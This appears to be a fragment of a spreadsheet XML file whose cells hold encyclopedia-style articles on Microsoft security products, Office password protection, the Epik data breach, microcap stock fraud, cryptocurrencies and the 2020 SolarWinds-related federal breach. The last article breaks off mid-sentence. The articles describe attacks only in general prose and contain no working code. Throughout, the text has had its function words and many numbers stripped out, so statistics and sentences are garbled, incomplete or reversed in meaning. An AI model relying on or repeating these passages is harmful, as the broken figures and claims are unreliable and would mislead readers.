technologies stated, view positive step landscape. believed right free antivirus software past eight years." however, raised issue distributing software product said, "microsoft simply make product available," adding integration microsoft security essentials microsoft windows would violation competition law. mcafee, sophos later trend micro affirmed antitrust lawsuit would surely followed microsoft bundled product windows.the announcement microsoft security essentials affected stocks vendors. november 2008, microsoft announced codename morro, symantec mcafee shares fell 9.44 6.62 percent respectively. june 2009, announcing upcoming beta version, microsoft shares rose percent, symantec mcafee fell percent respectively. daniel ives, analyst capital markets, said microsoft security essentials would "long-term competitive threat", although near-term impact would negligible. reviews awards public beta version received several reviews, citing resource usage, straightforward user interface price point. brian krebs washington post reported quick scan windows computer took minutes full scan minutes. technica reviewed positively, citing organized interface, resource usage, status freeware.nick mediati pcworld noted mse's "clear-cut" "cleanly designed" tabbed user interface. did, however, find settings cryptic confusing, defaulting "recommended action", explanation action found help file. also initially confused user interface failed mention microsoft security essentials automatically updates itself, rather manually updated update tab; explanation feature included final release.neil rubenking magazine successfully installed beta version malware-infected systems commented small installation package (about depending operating system) speedy installation. initial virus definition update took minutes, full installation occupied disk space. rubenking noted beta version sets windows update fully automatic mode, although turned windows control panel. some full scans took hour infected systems; scan clean system took minutes. on-demand scan test rubenking conducted june 2009 beta version found percent malware samples: percent commercial keyloggers, percent rootkits, half scareware samples. product's real-time protection found percent malware blocked majority percent commercial keyloggers percent rootkits found. january 2010, microsoft security essentials best free software award advisor. december year, secured bronze award av-comparatives proactive detection percent unknown malware, silver award false-positives (six occurrences) bronze award overall performance.in october 2009, av-test conducted series trials final build product detected caught 98.44 percent 545,034 computer viruses, computer worms software trojan horses well 90.95 percent 14,222 spyware adware samples. also detected eliminated tested rootkits, generating false-positives. between june 2010 january 2013, av-test tested microsoft security essentials times; cases, secured av-test certification outperforming industry average ratings. microsoft security essentials tested certified march 2011. product achieved protection score repair score usability score report details show although version able find malware samples wildlist (widespread malware), able stop internet-based attacks lacks personal firewall anti-spam capabilities. april 2012 test, version achieved scores 3.0, protection, repair usability. version windows (x64) tested june 2012 achieved scores 2.5, protection, repair usability. october 2012, product lost av-test certification microsoft security essentials achieved scores 1.5, protection, repair usability.in av-test's 2011 annual review, microsoft security essentials came last protection, seventh repair fifth usability. 2012 review, came last protection best usability; however, lost certificate, qualified usability award. june 2013, achieved lowest possible protection score, zero.microsoft drastically improved mse's detection time latest tests done av-test february 2018 achieved 100% detection malware samples "protection 0-day malware attacks, inclusive e-mail threats (real-world testing)" "detection widespread prevalent malware discovered last weeks (the av-test reference set)" categories, earning av-tests's "top product" award. market share september 2010, year initial release, microsoft announced million users. security industry market share analysis report june 2011, published opswat, describes popular products world, 10.66 percent global market: 15.68 percent north american market.: report shows microsoft number vendor north america 17.07 percent market share,: number four vendor worldwide.: john dunn pcworld, analyzed report, noted tendency free software something new: "after all, free antivirus suites around years tended seen poor relations paid software." named microsoft security essentials influence users adopt free software.a september 2011 opswat report found increased market share become second popular product world, remained popular north america. opswat reported march 2012 product maintained position, microsoft's market share improved percent worldwide percent north america. seth rosenblatt cnet news commented product's share rose 7.27 2010 10.08 2012, stating "use lightweight security suite exploded last year". impersonation malware popularity microsoft security essentials appearance malware abusing name. february 2010, rogue security package calling "security essentials 2010" appeared internet. designated trojandownloader:win32/fakeinit microsoft, bears visual resemblance microsoft product. reappeared november 2010, time calling "security essentials 2011". dangerous rogue software appeared august 2010. designated rogue:win32/fakepav unknown win32/trojan, closely resembles microsoft security essentials uses sophisticated social engineering deceive users infect systems, guise five different fictional anti-malware products. also terminates prevents launch different programs, including registry editor, windows command prompt, internet explorer, mozilla firefox, opera, safari, google chrome. also comparison antivirus software comparison firewalls internet security microsoft defender windows security center references notes citations external links official website microsoft security portal</t>
  </si>
  <si>
    <t>Microsoft Safety Scanner</t>
  </si>
  <si>
    <t>microsoft safety scanner free disposable virus scanner similar windows malicious software removal tool used scan system computer viruses forms malware. released april 2011, following discontinuation windows live onecare safety scanner.it meant used day-to-day tool, provide real-time protection viruses, cannot update virus definitions expires days. however, computer already antivirus product without potential interference, therefore used scan potentially infected computer second check another antivirus program. uses detection engine malware definitions microsoft security essentials microsoft forefront endpoint protection. license restriction july 2011, part microsoft safety scanner's end-user license agreement restricts reads: installation rights. install copy software device design, develop test programs. notes references further reading external links official website</t>
  </si>
  <si>
    <t>Microsoft Office password protection</t>
  </si>
  <si>
    <t>microsoft office password protection security feature protect microsoft office (word, excel, powerpoint) documents user-provided password. types microsoft office applications offer main groups passwords document depending whether encrypt password-protected document not. passwords encrypt password-protected document different security level features microsoft office applications mentioned below. microsoft word microsoft powerpoint passwords restrict modification entire document presentation. microsoft excel passwords restrict modification workbook, worksheet within individual elements worksheet.the password encrypts document also restricts user opening document. possible type password microsoft office applications. user fails enter correct password field appears attempt open password-protected document, viewing editing document possible. encryption document protected password open hacker needs decrypt document access contents. history microsoft encryption password excel word prior editions weak protection algorithm used converts password 16-bit verifier 16-byte obfuscation array (page 60/119) (https://interoperability.blob.core.windows.net/files/ms-offcrypto/%5bms-offcrypto%5d.pdf) key. hacking software readily available find 16-byte decrypt password-protected document instantly (because like vigenere cipher).in excel word 2000 length increased bits. this protection algorithm also currently considered weak presents difficulties hacking software. default protection office 2003 changed, opportunity custom protection algorithm added. choosing non-standard cryptographic service provider allows increasing length. weak passwords still recovered quickly even custom office 2007 (word, excel powerpoint), protection significantly enhanced since modern protection algorithm named advanced encryption standard used. present software break encryption. with help sha-1 hash function, password stretched 128-bit 50,000 times opening document; result, time required crack vastly increased. excel word 2010 employed 128-bit key, number sha-1 conversions doubled 100,000.office 2013 (access, excel, onenote, powerpoint, project, word) uses 128-bit aes, hash algorithm sha-1 default.office 2016 (access, excel, onenote, powerpoint, project, word) uses 256-bit aes, sha-1 hash algorithm, (cipher block chaining) default. excel worksheets macro protection protection worksheets macros necessarily weaker entire workbook software must able display them. password recovery attacks there number attacks employed find password remove password protection excel word documents. password removal done help precomputation tables guaranteed decryption attack. attacks target original password microsoft excel word include dictionary attack, rule-based attack, brute-force attack, mask attack statistics-based attack. efficiency attacks considerably enhanced following means applied: multiple cpus (distributed attack), gpgpu (applicable microsoft office 2007–2010 documents) cloud computing. office 2013 introduces sha-512 hashes encryption algorithm, making brute-force rainbow table attacks slower. however, note hash algorithms faster calculate certain other, slower hashes pbkdf2, scrypt kdfs.for xlsx files opened edited, another attack, file format group files within zip, unzipping editing replacing workbook.xml file, and/or individual worksheet files identical copies, except unknown salt replaced known pair, removing altogether allows sheets edited. ultimately, security password-protected document dependent user choosing password sufficient complexity. password determined guesswork social engineering, underlying cipher important. references</t>
  </si>
  <si>
    <t>Phoenix Labs (software)</t>
  </si>
  <si>
    <t>phoenix labs (formerly methlabs) software developing community founded leonard mcclelland best known peerguardian, open-source software program optimized personal firewall file sharing networks. history group originally organized work peerguardian, program leonard created 2003 response shutdown audiogalaxy file sharing site. name methlabs came leonard's handle, 'method'. late 2004, group added blocklist.org, website designed allow users interactively manage block addresses certain organisations companies. phoenix labs formed september 2005 following dispute members methlabs team. according phoenix labs press release, "series threats incidents" forced group methlabs.org website. press release attributed action team member responsibility finances server control. based information participants, internet news sources identified person using nickname "cerberius", cerberius reportedly disputed charges domain hijacking described situation "revolt". method members group decided could methlabs.com domain back, decided took suggestions name channel. user named 'bizzyb0t' came name "phoenixlabs.org" represent group reborn "rising ashes". products peerguardian peerguardian free open source programs capable blocking incoming outgoing connections based blocklists. their purpose block several organizations, including riaa mpaa using file sharing networks fasttrack bittorrent. system also advertising, spyware, government educational ranges, depending upon user preferences. other programs developed phoenix labs file-sharing client, deepdelete, program erasing files securely make extremely difficult recover. latter longer development. external links phoenix labs website phoenix labs wiki sources</t>
  </si>
  <si>
    <t>Microsoft ION</t>
  </si>
  <si>
    <t>microsoft microsoft's self-sovereign identity system. builds bitcoin blockchain ipfs sidetree-based network. references external links https://techcommunity.microsoft.com/t5/identity-standards-blog/ion-we-have-liftoff/ba-p/1441555</t>
  </si>
  <si>
    <t>Microsoft Fingerprint Reader</t>
  </si>
  <si>
    <t>microsoft fingerprint reader device sold microsoft, primarily homes small businesses. underlying software providing biometrics developed digital persona. fingerprint readers secure, reliable convenient normal traditional password, although subject spoofing. fingerprint recognition system tightly linked specific user than, e.g., access card, stolen. history first released september 2004, device supported windows windows vista operating systems. discontinued shortly windows vista released. functionality fingerprint reader's software allows registration fingerprints device. login names passwords associated registered fingerprints stored database user's computer. presentation authorized fingerprint, software passes associated login names passwords compatible applications websites, allowing login without keyboard. software finds particular fingerprint match database, declines access. application 64-bit windows microsoft fingerprint reader modified work 64-bit windows. firefox browser reader works firefox using fingerfox add-on. also fingerprint fingerprint verification competition references external links webarchive fingerprint home page</t>
  </si>
  <si>
    <t>Microsoft Exchange Hosted Services</t>
  </si>
  <si>
    <t>microsoft exchange hosted services, also known frontbridge, email filtering system owned microsoft. acquired 2005 frontbridge inc. frontbridge technologies began 2000 bigfish communications marina rey, california. service sold directly partnership sprint nextel. march 2006, microsoft announced branding, licensing model road microsoft exchange hosted services (ehs), formerly known frontbridge technologies inc. with microsoft exchange hosted services (ehs), four products introduced.ehs filtering filter actively help protect inbound outbound e-mail spam, viruses, phishing scams e-mail policy violations. archive message archiving system e-mail instant messages. continuity security-enhanced interface allowed ongoing access e-mail unplanned outages on-premises e-mail environment. encryption preserve e-mail confidentiality allowing users send receive encrypted e-mail also microsoft forefront online protection exchange hosted desktop references</t>
  </si>
  <si>
    <t>Microsoft Azure Active Directory</t>
  </si>
  <si>
    <t>computing, microsoft azure active directory, commonly known azure system microsoft azure enables identity management configure accessibility users groups services resources. shares name similar directory service found windows server, azure active directory replacement on-premises local directory service. azure based active directory, incorporates different features providing identity service (idaas). also azure connect active directory references</t>
  </si>
  <si>
    <t>Auroracoin</t>
  </si>
  <si>
    <t>auroracoin (code: aur, symbol: peer-to-peer cryptocurrency launched february 2014 icelandic alternative bitcoin icelandic króna. unknown creator creators pseudonym baldur friggjar óðinsson odinsson). they stated planned distribute half auroracoins would ever created 330,000 people listed iceland's national database beginning march 2014, free charge, coming 31.8 auroracoins person.auroracoin created alternative currency address government restrictions iceland's króna, place since 2008, severely restricts movement currency outside country. history suggested many ways, iceland could seen ideal place virtual currency' account limited cash, extensive familiarity electronic finance, extensive interest bitcoin icelandic society, coupled long-term instability króna.it originally based litecoin scrypt proof-of-work algorithm, march 2016 codebase released using multi-algo architecture based digibyte pioneered myriadcoin. airdrop using kennitala national identification system give away total issuance auroracoins population iceland, process dubbed "airdrop", developer hoped bootstrap network effect introduce cryptocurrency national audience.phase airdrop began march 2014, 31.8 distributed claimant. with value $12.11 coin march icelanders receiving equivalent $385. price quickly began fall broad issuance coins. within airdrop launch, approximately 281,000 coins distributed price dropped nearly versus bitcoin. when phase airdrop completed july 2014 estimated 1,126,674 disbursed among 35,430 claimants, total iceland population 323,002 (2013). second phase airdrop july november 2014. with value fallen dramatically krona amount claim increased coins. about 5024 claims totalling almost million coins made. final phase airdrop took place november 2014 march 2015 nearly million coins claimed 2600 icelanders. time price fallen sharply payout increased coins recipient. april 2015 accordance original airdrop plan, 5,344,628 unclaimed pre-mined coins verifiably 'burned' made inaccessible sent address aurburnaurburnaurburnaurburn7es4rf. foundation auroracoin foundation launched march 2015 spearhead technical development promote auroracoin iceland. foundation granted 1,000,000 developer help fund work. controversy 2015, legal status cryptocurrencies iceland unclear, though auroracoin airdrop involved government approval odinsson's national database citizens, íslykill. some icelandic politicians taken negative view auroracoin. during parliamentary debate march 2014, pétur blöndal, vice-chair parliament's economic affairs trade committee (eatc), emphasized potential evasion auroracoin could impact iceland's economy. also said public realize auroracoin recognized currency since no-one backs medium".mp frosti sigurjónsson, member ruling progressive party chairman eatc, suggested blog post website evidence auroracoin illegal financial "scam".óðinsson said "(parliament) make illegal trade auroracoin, however, never able control decentralized system, stop icelanders using currency, without turning iceland police state."between peak around november 2017, auroracoin's value fell 0.00008027 btc. references external links auroracoin foundation official website</t>
  </si>
  <si>
    <t>2021 Epik data breach</t>
  </si>
  <si>
    <t>epik data breach occurred 2021 targeted american domain registrar hosting company epik. breach exposed wide range information including personal information customers, domain history purchase records, credit card information, internal company emails, records company's whois privacy service. more million unique email addresses exposed, belonging customers non-customers whose information scraped. attackers responsible breach identified members hacktivist collective anonymous. attackers released initial gigabyte dataset september 2021, though data appeared exfiltrated late february year. second release, time containing bootable disk images, made september third release october reportedly contained bootable disk images documents belonging texas republican party, customer epik's.epik known providing services websites host far-right, neo-nazi, extremist content. past present epik customers include gab, parler, 8chan, oath keepers, proud boys. hack described rosetta stone far-right" allowed researchers journalists discover links far-right websites, groups, individuals. distributed denial secrets (ddosecrets) co-founder emma best said researchers describing breach "the panama papers hate groups".epik subsequently criticized data security practices, particular failing properly encrypt sensitive customer data. background anonymous decentralized international hacktivist collective widely known various cyber attacks several governments governmental institutions, corporations, church scientology. primarily active late 2000s early 2010s, anonymous' media profile diminished 2018. group re-emerged 2020 support george floyd protests causes.in september 2021, anonymous asked people support "operation jane", effort group oppose texas heartbeat act, six-week abortion went effect september september epik begun providing services "whistleblower" website anti-abortion texas right life organization, allowed people anonymously report suspected violators bill. website, moved epik denied services godaddy, went offline epik told group violated terms service collecting private information third parties. september anonymous hacked website republican party texas, hosted epik, replace text operation jane. data breach hackers identifying part anonymous announced september 2021 gained access large quantities epik data, including domain purchase transfer details, account credentials logins, payment history, employee emails, unidentified private keys. hackers claimed obtained decade's worth data", including customer data records domains ever hosted registered company, included poorly encrypted passwords sensitive data stored plaintext. distributed denial secrets (ddosecrets) organization announced later working curate leaked data public download, said consisted "180 gigabytes user, registration, forwarding information".journalists security researchers subsequently confirmed veracity hack types information exposed. data included leak appeared exfiltrated late february 2021. leak later confirmed include approximately million unique email addresses, belonged customers non-customers whose data scraped whois records. also included 843,000 transactions period years, almost million invoices. engineer performing initial impact assessment epik customer said epik's "entire primary database", contained account usernames, passwords, keys, credit card numbers stored plaintext, also compromised. internal memos describing subpoenas preservation requests also found leaked data. many data preservation requests appeared related investigations following january capitol attack.a security researcher speaking techcrunch said identified security vulnerability epik january, reported monster, epik ceo, acknowledged. vulnerability would allowed attackers execute arbitrary code epik servers, researcher said suspected vulnerability exploited anonymous attackers. monster told techcrunch seen report, mistook spam.on september anonymous released another gigabytes data including bootable disk images. according cybersecurity expert speaking daily dot, "files thing, virtual machine disk image allows boot company’s entire server own. usually breaches database dumps, documents, configuration files, etc. case, talking entire server image, programs files required host application serving." second leak included keys plaintext login credentials epik's systems, well services including coinbase, paypal, company's twitter account.a third release october reportedly contained bootable disk images, well documents belonging texas republican party. company response september hacked data released, epik said statements news outlets "not aware breach". when company acknowledge breach, attackers vandalized epik's support website. september company sent email customers notifying alleged security incident". monster acknowledged hack september public video conference, daily described "chaotic bizarre" monde characterized "possibly strangest responses computer security incident history". company publicly confirmed breach september began emailing customers inform september data breach monitoring service have been pwned? also began sending emails addresses exposed september 19.epik submitted data-breach notice state maine, reported 110,000 people affected breach, financial account credit card data exposed. statement washington post, epik spokesperson said 38,000 credit card numbers leaked. aftermath hack described rosetta stone far-right", allowing researchers journalists connect links various far-right websites, groups, individuals using epik's services. ddosecrets co-founder emma best said researchers describing breach "the panama papers hate groups", said researchers would long haul" amount data exposed. columbia journalism review similarly compared data breach panama papers leak, stating "like panama papers, getting information huge database making sense time-consuming, explain coverage epik hack lagged..." data hack used show alexander, far-right activist figure "stop steal" conspiracy theory campaign, worked hide connections websites 2021 united states capitol attack. reactions extremism researcher computer scientist megan squire said hack, "it's massive. biggest domain-style leak i've seen and, extremism researcher, certainly interesting." internet anthropologist gabriella coleman predicted hack would force far-right groups find security providers outside united states, said hack "confirmed details far-right ecosystem". cybersecurity analyst online extremism researcher emily crose said breach would likely intensify existing paranoia among far-right groups, already felt like surveilled capitol attack.an engineer performing initial impact assessment epik client told daily "[epik] fully compromised end-to-end maybe worst i've ever seen 20-year career". following hack, washington post reported "epik's security protocols target ridicule among researchers, who've marveled site's apparent failure take basic security precautions". epik storing passwords using unsalted md5, making easy crack. other sensitive data, including credit card information, stored plaintext.david vladeck, georgetown professor former head federal trade commission's (ftc) consumer protection bureau, said, "given epik's boasts security, scope hosting, would think would target, especially company warned failed take protective action". other breaches weeks initial release data, hackers released data taken american far-right oath keepers militia. hackers responsible oath keepers leak claim connection anonymous draw connection epik breach, though journalists speculated leak related made possible information epik data. oath keepers data consists gigabytes email archives, chat logs, membership list. data also disseminated ddosecrets, though group restricted list members files containing donor finance information journalists. oath keepers customer epik's since january 2021, website taken offline hosting provider terminated service wake capitol attack. also list security hacking incidents (social network) hacks data leaks parler security references</t>
  </si>
  <si>
    <t>AuthenTec</t>
  </si>
  <si>
    <t>authentec, inc. semiconductor, computer security, mobile security, identity management, biometrics, touch control solutions company based melbourne, florida. founded 1998 spun harris semiconductor, authentec provided mobile security software licenses mobile manufacturing companies biometrics sensor technology, fingerprint sensors technology mobile computer manufacturers. july 2012, authentec acquired apple inc. $356 million. history 1998, authentec spun parent company harris semiconductor. june 2007, authentec became publicly traded company. 2008, authentec acquired ezvalidation. july 2009, authentec acquired atrua technologies $5m. february 2010, authentec acquired safenet's embedded security solutions division. september 2010, authentec merged upek. august 2011, authentec began collaborating semiconductors mobile payment software firm devicefidelity provide combination wireless chips, sensors, mobile applications micro-sd cards manufacturers mobile network carriers android devices support mobile payments transportation check-ins. july 2012, authentec acquired apple inc. $356m. products services trueprint smart sensors truesuite identity management software trueprotect embedded security products (formerly safenet embedded security solutions) touch also touch references</t>
  </si>
  <si>
    <t>Microcap stock fraud</t>
  </si>
  <si>
    <t>microcap stock fraud form securities fraud involving stocks "microcap" companies, generally defined united states market capitalization $250 million. prevalence estimated billions dollars year. many microcap stocks penny stocks, defines security trades less share, listed national exchange, fails meet specific criteria.microcap stock fraud generally takes place among stocks traded bulletin board pink sheets electronic quotation service, stocks usually meet requirements listed stock exchanges. some fraud occurs among stocks traded nasdaq small market, called nasdaq capital market.microcap fraud encompasses several types investor fraud: pump dump schemes, involving false misleading statements hype stocks, "dumped" public inflated prices. such schemes involve telemarketing internet fraud. chop stocks, stocks purchased pennies sold dollars, providing brokers stock promoters massive profits. brokers often paid "under table" undisclosed payoffs sell stocks. dump dilute schemes, companies repeatedly issue shares reason taking investors' money away. companies using kind scheme tend periodically reverse-split stock. other unscrupulous brokerage practices, including "bait-and-switch", unauthorized trading, sales" policies customers prohibited discouraged selling stocks. pump dump many penny stocks, particularly trade fractions cent, thinly traded. they become target stock promoters manipulators. these manipulators first purchase large quantities stock, drive share price false misleading positive statements; sell shares large profit. this referred "pump dump" scheme. pump dump form microcap stock fraud. sophisticated versions fraud, individuals organizations millions shares, newsletter websites, chat rooms, stock message boards, press releases, e-mail blasts drive interest stock. very often, perpetrator claim inside information impending news persuade unwitting investor quickly shares. when buying pressure pushes share price rise price entices people believe hype shares well. eventually manipulators "pumping" "dumping" sell holdings.the expanding internet personal communication devices made penny stock scams easier perpetrate. though scam notable example rapper cent's twitter cause price penny stock (hnhi) increase dramatically. cent previously bought million shares company, result made $8.7 million profit. another example activity skirts borderline legitimate promotion hype case lexg. described (but perhaps overstated) "the biggest stock promotion time", lithium exploration group's market capitalization soared $350 million extensive direct mail campaign. promotion drew upon legitimate growth production lithium, touting lithium exploration group's position within sector. according company's december 2010 form 10-q (filed within months direct mail promotion), lexg lithium company without assets. revenues assets time zero. subsequently, company acquire lithium production/exploration properties, addressed concerns raised press.penny stock companies often liquidity. investors encounter difficulty selling positions buying pressure abated, manipulators fled. chop stocks chop stock equity, usually trading nasdaq stock market, bulletin board pink sheets listing services, purchased pennies share sold unscrupulous stock brokers unsuspecting retail customers several dollars share.this practice differs pump dump brokerages make money, addition hyping stock, marketing security purchase deep discount. practice, brokerage firm generally acquires block stock purchasing large block securities (usually large shareholder affiliated underlying company) negotiated price well current market price (generally then-current quoted offer/ask price) acquires stock payment consulting agreement.the subject stocks usually little liquidity prior block purchase. after block purchased, firm's participating brokers sell stock brokerage customers then-current quoted offer/ask price, often victimized investors generally unaware practice. this large difference, "spread" then-current quoted offer/ask price deeply discounted price block stock purchased almost always shared stockbroker firm solicited trade. reason, large benefit inherent conflict interest firm broker sell "proprietary products". because firm technically risk" block stock price stock drops price block purchased, firm loss stock) stock usually sold even slightly then-current prevailing market price offer/ask, practice still legal united states. fact, required profit spread disclosed client, since technically "commission". when securities dealer sells instruments inventory, client receive trade confirmation stating transaction done "riskless principal" "markup", fact, like commissions, also revenue firm, practice often subject abuse. only amount fees charged offer/ask commissions, must disclosed. even though still legal, frowned upon securities exchange commission, using laws methods attack indirectly thwart practice. organized crime involvement microcap fraud major source income organized crime. figures five families york mafia, well jersey mob, become involved stock scams. russian mafia also involved type microcap stock fraud. mafia involvement 1990s stock swindles first explored investigative reporter gary weiss december 1996 business week article. weiss later explored mafia's wall street scams book.organized crime elements believed short-selling chop stocks late 1990s. penny stock regulation method regulating restricting pump-and-dump manipulators target category stocks often associated scheme. end, penny stocks target heightened enforcement efforts. united states, regulators defined penny stock security must meet number specific standards. criteria include price, market capitalization, minimum shareholder equity. securities traded national stock exchange, regardless price, exempt regulatory designation penny stock, since thought exchange-traded securities less vulnerable manipulation. therefore, citigroup (nyse:c) nyse listed securities traded $1.00 market downturn 2008–2009, properly regarded "low priced" securities, technically "penny stocks". although penny stock trading united states primarily controlled rules regulations enforced u.s. securities exchange commission financial industry regulatory authority (finra), genesis control found state securities law. state georgia first state codify comprehensive penny stock securities law. secretary state cleland, whose office enforced state securities laws principal proponent legislation. representative chesley morton, stockbroker georgia general assembly time, principal sponsor bill house representatives. georgia's penny stock subsequently challenged court. however, eventually upheld u.s. district court, statute became template laws enacted states. shortly thereafter, finra enacted comprehensive revisions penny stock regulations. these regulations proved effective either closing greatly restricting broker/dealers, blinder, robinson company, specialized penny stocks sector. meyer blinder jailed securities fraud 1992, collapse firm. however, sanctions specific regulations lack effective means address pump-and-dump schemes perpetrated unregistered groups individuals. penny stock scam india income authorities india 2006 unearthed million dollar penny stock scam bangalore. scam fallout nationwide income raids premises businessmen april 2006, suspecting large scale money laundering evasion ramping shares small firms. around premises raided mumbai bangalore. after raids, additional commissioner team investigated scam. they pursued investigations issued orders december 2008 said national ramifications. team found traders ramped penny stocks launder money organised crime serious economic offence misused provisions securities exchange board india registrar co-operatives. this route chosen capital gains legalise unaccounted money. april central board direct taxes ministry finance billed case best investigation assessment order year. team picked accounts chikpet traders penny stocks found bogus claims capital gain.the finding also debunked claim demat sacrosanct though depository participation role manipulation, demat procedure misused. popular culture microcap stock fraud explored several books movies: book explored microcap fraud 2003 book born steal gary weiss. described microcap underworld 1990s eyes young broker named louis pasciuto. although book focuses mafia infiltration brokerages, also describes detail operation microcap fraud. microcap fraud explored anonymously written books license steal scorpion frog. both books explore pump-and-dump schemes detail but, unlike born steal, provide real names specific firms people described. this kind fraud also provided title book robert tillman michael indergaard called pump dump: rancid rules economy. fictional account pump-and-dump schemes seen movie boiler room. according press accounts, director writer film worked briefly cold-caller stratton oakmont brokerage house, shut regulators late 1990s. stratton oakmont jordan belfort, jailed fraud, whose memoir, wolf wall street, basis 2013 film martin scorsese. pump-and-dump scam also subject several episodes popular series, sopranos, pulled christopher moltisanti, matthew bevilaqua sean gismonte. episode legal drama order, entitled "trade this", murder young stockbroker prestigious firm found related boss's involvement several pump-and-dump scams financed members mafia crime family. similarly, franchise's first computer game, order: dead money, victim female stockbroker investigated pump-and-dump scam involving biotech company's suspicious ipo. this strategy also fictionalised jeffrey archer book penny more, penny less. references further reading gary weiss, born steal: when mafia wall street (2003, isbn 0-446-52857-9) external links york report micro-cap fraud 1997 article chop stocks stock fraud, business week testimony organized crime markets, september 2000 chop stock suey investors beware: chop stocks rise</t>
  </si>
  <si>
    <t>BitOasis Exchange</t>
  </si>
  <si>
    <t>bitoasis cryptocurrency exchange operating mena region. region's first crypto currency platform. headquartered uae. bitoasis founded year 2015 became registered reporting entity goaml anti-money laundering system september 2021. founded doudin. history bitoasis founded year 2015 doudin. started cryptocurrency trading platform buy, sell, trade. trade carried using local currencies like sar.in 2021, blex financial limited, bitoasis's adgm registered entity, received approvals financial regulators uae. granted financial services permission (fsp) financial services regulatory authority (fsra) dhabi global market. references</t>
  </si>
  <si>
    <t>2020 United States federal government data breach</t>
  </si>
  <si>
    <t>2020, major cyberattack suspected committed group backed russian government penetrated thousands organizations globally including multiple parts united states federal government, leading series data breaches. cyberattack data breach reported among worst cyber-espionage incidents ever suffered u.s., sensitivity high profile targets long duration (eight nine months) hackers access. within days discovery, least organizations around world reported affected attack, also suffered data breaches. affected organizations worldwide included nato, u.k. government, european parliament, microsoft others.the attack, gone undetected months, first publicly reported december 2020, initially known affected u.s. treasury department national telecommunications information administration (ntia), part u.s. department commerce. following days, departments private organizations reported breaches.the cyberattack breaches began later march 2020. attackers exploited software credentials least three u.s. firms: microsoft, solarwinds, vmware. supply chain attack microsoft cloud services provided attackers breach victims, depending upon whether victims bought services reseller. supply chain attack solarwinds's orion software, widely used government industry, provided another avenue, victim used software. flaws microsoft vmware products allowed attackers access emails documents, perform federated authentication across victim resources single sign-on infrastructure.in addition theft data, attack caused costly inconvenience tens thousands solarwinds customers, check whether breached, take systems offline begin months-long decontamination procedures precaution. u.s. senator richard durbin described cyberattack tantamount declaration war. president donald trump silent days attack, suggesting china, russia, might responsible "everything well control". background global data breach occurred course least months final year presidency donald trump. throughout time, white house lacked cybersecurity coordinator, trump eliminated post 2018. when breach discovered, u.s. also lacked senate-confirmed director cybersecurity infrastructure security agency (cisa), nation's cybersecurity official, responsible coordinating incident response. incumbent, chris krebs, fired november 2020. also time, department homeland security (dhs), manages cisa, lacked senate-confirmed secretary, deputy secretary, general counsel, undersecretary intelligence analysis, undersecretary management; trump recently forced deputy director cisa. numerous federal cybersecurity recommendations made government accountability office others implemented.solarwinds, texas-based provider network monitoring software u.s. federal government, shown several security shortcomings prior attack. solarwinds employ chief information security officer senior director cybersecurity. cybercriminals selling access solarwinds's infrastructure since least early 2017. solarwinds advising customers disable antivirus tools installing solarwinds software. november 2019, security researcher warned solarwinds server secure, warning "any hacker could upload malicious [files]" would distributed solarwinds customers. furthermore, solarwinds's microsoft office account compromised, attackers able access emails possibly documents.on december 2020, days trojaned solarwinds software publicly confirmed used attack organizations, longstanding solarwinds kevin thompson retired. that day, private equity firms ties solarwinds's board sold substantial amounts stock solarwinds. firms denied insider trading. methodology multiple attack vectors used course breaching various victims incident. microsoft exploits think data available ceo, data available services, [the attacker would get] data. attackers exploited flaws microsoft products, services, software distribution infrastructure.at least reseller microsoft cloud services compromised attackers, constituting supply chain attack allowed attackers access microsoft cloud services used reseller's customers.alongside this, "zerologon", vulnerability microsoft authentication protocol netlogon, allowed attackers access valid usernames passwords microsoft network breached. this allowed access additional credentials necessary assume privileges legitimate user network, turn allowed compromise microsoft office email accounts.additionally, flaw microsoft's outlook allowed attackers bypass multi-factor authentication.attackers found broken microsoft office allowed monitor ntia treasury staff emails several months. this attack apparently used counterfeit identity tokens kind, allowing attackers trick microsoft's authentication systems. presence single sign-on infrastructure increased viability attack. solarwinds exploit this classic espionage. it's done highly sophisticated stealthy operation. here, too, attackers used supply chain attack. attackers accessed build system belonging software company solarwinds, possibly solarwinds's microsoft office account, also compromised point.the attackers established foothold solarwinds's software publishing infrastructure later september 2019. build system, attackers surreptitiously modified software updates provided solarwinds users network monitoring software orion. first known modification, october 2019, merely proof concept. once proof established, attackers spent december 2019 february 2020 setting command-and-control infrastructure.in march 2020, attackers began plant remote access tool malware orion updates, thereby trojaning them. these users included u.s. government customers executive branch, military, intelligence services (see impact section, below). user installed update, would execute malware payload, would stay dormant 12–14 days attempting communicate several command-and-control servers. communications designed mimic legitimate solarwinds traffic. able contact servers, would alert attackers successful malware deployment offer attackers back door attackers could choose utilise wished exploit system further. malware started contact command-and-control servers april 2020, initially north america europe subsequently continents too.the attackers appear utilized small fraction successful malware deployments: ones located within computer networks belonging high-value targets. once inside target networks, attackers pivoted, installing exploitation tools cobalt strike components, seeking additional access. because orion connected customers' office accounts trusted 3rd-party application, attackers able access emails confidential documents. this access apparently helped hunt certificates would sign saml tokens, allowing masquerade legitimate users additional on-premises services cloud services like microsoft azure active directory. once additional footholds obtained, disabling compromised orion software would longer sufficient sever attackers' access target network. having accessed data interest, encrypted exfiltrated it.the attackers hosted command-and-control servers commercial cloud services amazon, microsoft, godaddy others. using command-and-control addresses based u.s., much malware involved new, attackers able evade detection einstein, national cybersecurity system operated department homeland security (dhs).fbi investigators recently found separate flaw software made solarwinds corp used hackers tied another foreign government help break u.s. government computers. vmware exploits vulnerabilities vmware access vmware identity manager, allowing existing network intruders pivot gain persistence, utilized 2020 russian state-sponsored attackers. december 2020, definitively known sunburst trojan would provided suitable access exploit vmware bugs, definitively known whether attackers fact chained exploits wild. discovery microsoft exploits during 2019 2020, cybersecurity firm volexity discovered attacker making suspicious usage microsoft products within network think tank whose identity publicly revealed. attacker exploited vulnerability organization's microsoft exchange control panel, used novel method bypass multi-factor authentication. later, june july 2020, volexity observed attacker utilising solarwinds orion trojan; i.e. attacker used microsoft vulnerabilities (initially) solarwinds supply chain attacks (later achieve goals. volexity said able identify attacker.also 2020, microsoft detected attackers using microsoft azure infrastructure attempt access emails belonging crowdstrike. that attack failed security reasons crowdstrike office email.separately, shortly october 2020, microsoft threat intelligence center reported apparently state-sponsored attacker observed exploiting zerologon, vulnerability microsoft's netlogon protocol. this reported cisa, issued alert october 2020, specifically warning state, local, territorial tribal governments search indicators compromise, instructing rebuild networks scratch compromised. using virustotal, intercept discovered continued indicators compromise december 2020, suggesting attacker might still active network city government austin, texas. solarwinds exploit december 2020, cybersecurity firm fireeye announced team tools stolen believed state-sponsored attacker. fireeye believed target svr, russia's foreign intelligence service. fireeye says discovered solarwinds supply chain attack course investigating fireeye's 